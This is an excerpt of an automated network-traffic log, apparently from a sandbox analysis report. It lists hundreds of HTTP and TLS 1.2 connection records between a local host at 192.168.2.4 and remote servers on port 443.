                            Source: unknownNetwork traffic detected: HTTP traffic on port 52346 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52103 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52357 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52246 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51998 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52108 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52011 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52275 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51975 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52384 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52349 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52326 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52172 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52023 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52287 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52372 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52034 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52298 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52338 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52160 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52045 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52299 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52000 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52350 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52373 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51976 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52300
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52301
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52302
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51987 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52022 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51945 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51988
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51986
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51987
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52047 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52288 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51985
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51988 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52127 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52371 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52222 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51997
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51998
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52383 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52196 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52348 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52150 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52277 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52359 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51977 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52244 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52139 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52382 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52068 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52151 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52035 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51944 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51955 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52289 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52117 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52315 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52057 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52239
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52354
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52355
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52352
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52232
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52116
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52358
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52117
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52359
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52356
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52357
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52089 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52364 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52146 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52120
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52362
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52387 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52077 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52352 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51978 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52008
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52009
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52002
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52244
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52365
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52366
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52121
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52157 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52242
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52363
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52364
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52127
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52369
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51932 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52246
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52367
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52368
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52341 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52130
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52372
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52010
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52373
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52371
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51943 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52078 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51954 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51931 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52330 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52135 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52134
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52255
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52135
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52377
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52011
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52374
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52254
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52139
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52378
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51919 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52379
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52090 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52380
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52262
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52383
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52021
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52142
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52263
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52384
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52381
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52382
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52180 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52008 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52145
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52387
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52025
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52146
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52388
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52022
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52264
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52023
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52265
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52386
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52274
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52032
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52150
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52151
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52311
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52009 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52315
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52312
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52313
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51942 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52339 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52044 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52021 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52329
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52206
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52207
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52109 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52010 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52274 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52200
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52322
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52362 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52326
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51953 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52202
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52323
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52324
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52386 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52351 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51929 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52219
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52338
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52339
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52032 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52332
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52333
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52330
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52331
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52336
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52088 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52363 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52334
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52335
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52065 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52340 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52340
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52170 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52109
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52228
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52349
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52108
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52159 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52229
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52297 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52101
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52222
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52102
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52344
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52220
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52341
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52221
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52347
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52348
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52103
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52329 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52345
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51918 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52104
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52346
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52350
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52230
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52351
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52202 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52374 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52378 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52077
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52078
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52120 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52063 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52082
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52080
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52088
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52089
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52344 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52229 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52095
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52263 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52189 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52090
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52355 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52102 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52228 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52356 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52333 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52121 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52064 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51951 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52367 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52206 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51928 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52035
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52179 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52277
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52322 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52157
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52275
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52034
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52037
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52279
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52159
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52160
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52163
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52164
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52262 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52331 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52354 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52288
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52047
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52239 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52289
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52044
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52045
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52287
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52048
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52101 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52170
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52291
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52365 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52172
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52057
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52299
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52179
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52297
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52056
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52298
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52366 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52180
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52064
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52065
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52186
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52063
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52377 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52134 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52068
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52189
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52187
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52188
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52388 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52196
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52197
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52145 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52332 -> 443
                            Source: unknownHTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.4:49730 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49736 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49737 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49743 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49744 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49747 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49748 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49756 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49762 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49763 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49778 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49779 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49782 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49783 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49791 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49792 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51918 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51919 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:51929 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:51931 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51944 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51943 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51951 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51953 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51975 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51978 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51985 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51986 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51997 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:51998 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52009 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52008 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52032 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52034 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52044 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52045 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52078 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52077 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52088 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52089 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52109 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52108 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52116 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52120 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52134 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52139 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52160 version: TLS 1.2
